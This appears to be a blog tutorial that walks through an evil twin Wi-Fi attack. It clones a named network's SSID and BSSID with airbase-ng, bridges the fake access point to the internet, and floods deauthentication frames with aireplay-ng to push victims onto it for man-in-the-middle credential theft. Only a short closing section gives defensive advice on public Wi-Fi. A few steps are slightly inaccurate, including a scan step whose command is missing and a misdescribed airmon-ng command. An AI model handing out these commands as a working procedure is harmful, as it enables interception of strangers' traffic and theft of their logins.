What is an Evil Twin Access Point?
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.
Devices connecting to a Wi-Fi network like laptops, tablets, and smartphones have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.
Enable Monitor Mode
To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.
Aircrack-ng is a popular set of tools used to crack wireless networks. It is a suite of tools that includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).
Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it’s functioning correctly by entering the following command:
airmon-ng check kill
This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.
The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.
airmon-ng start wlan0
This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.
Locate the Target Wireless Network
The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:
CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 – 1 0 1
The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.
Create the Evil Twin
Once you’ve found the network which you wish to clone, run the following command in another terminal:
airbase-ng -a 28:EF:01:35:34:85 –e SkyNet -c 6 wlan0mon
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon 21:39:29 Created tap interface at0 21:39:29 Trying to set MTU on at0 to 1500 21:39:29 Trying to set MTU on wlan0mon to 1800 21:39:29 Access Point with BSSID 28:EF:01:35:34:85 started.
This command creates an Evil Twin network with the SSID name SkyNet, however, it will not be able to provide internet access yet.
Provide Internet Access to the Evil Twin
I will add the bridge interface, called fake, you can name it any way you like.
brctl addbr fake
Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).
brctl addif fake eth0 brctl addif fake at0
Assign IP addresses to the interface and bring them up using ifconfig:
ifconfig at0 0.0.0.0 up ifconfig fake up
You can take a look at the bridge network interface with ifconfig:
ifconfig at0 Link encap:Ethernet HWaddr 74:85:2a inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:4 errors:0 dropped:0 overruns:0 frame:0 TX packets:349 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 RX bytes:540 (540.0 B) TX bytes:54845 (53.3 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8 inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0 inet6 addr: fe80::cabc:a6c1/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:640 errors:0 dropped:0 overruns:0 frame:0 TX packets:529 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB) Interrupt:17
fake Link encap:Ethernet HWaddr 74:85:2a inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0 inet6 addr: fe80:::fe97:5b08/64 Scope:Link inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:859 errors:0 dropped:0 overruns:0 frame:0 TX packets:684 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)
Kick Wireless Clients from the Legitimate AP
The next step is to kick wireless clients off the legitimate AP, in my case, that’s SkyNet network. You can do this by using aireplay-ng.
aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon
This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.
As you can see in the output below, a client has associated with my evil twin. This information is found in the airebase-ng terminal (client 28:EF:01:23:46:68 associated).
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon 14:50:56 Created tap interface at0 14:50:56 Trying to set MTU on at0 to 1500 14:50:56 Trying to set MTU on wlan5 to 1800 14:50:56 Access Point with BSSID 28:EF:01:35:34:85 started. 14:58:55 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet" 15:03:24 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
At this point, all the victim’s traffic is going through the attacker’s machine, he or she can capture sensitive information since it’s technically a Man-in-the-Middle attack.
The attacker can perform various attacks like DNS spoofing which redirects the victim to a cloned or fake login page. Once the victim tries to login, the hacker harvests the credentials.
In today’s digital age, using public Wi-Fi networks has become a common practice for many people. However, it’s important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.
To stay safe when using public Wi-Fi hotspots, there are a few key things to keep in mind. Firstly, always make sure that you are connecting to a legitimate network. Hackers often set up fake Wi-Fi hotspots with names that sound similar to the real thing, in order to trick people into connecting to them. If you’re not sure whether a network is legitimate or not, it’s best to err on the side of caution and avoid connecting to it.
Secondly, it’s important to remember that public Wi-Fi networks are generally not secure, and any information that you send or receive over these networks may be vulnerable to interception by hackers. Therefore, it’s best to avoid making any financial transactions or entering sensitive personal information (such as passwords or account numbers) when using public Wi-Fi. Stick to basic web surfing and avoid entering any confidential information.
Finally, if you see two networks with identical names, it’s best to avoid connecting to either one of them. This could be a sign that someone is trying to set up a fake network in order to steal your personal information.
In conclusion, while public Wi-Fi hotspots can be a convenient way to access the internet on the go, it’s important to be aware of the risks associated with using these networks. By taking a few simple precautions, such as connecting only to legitimate networks and avoiding sensitive transactions, you can help to keep your personal information safe and secure.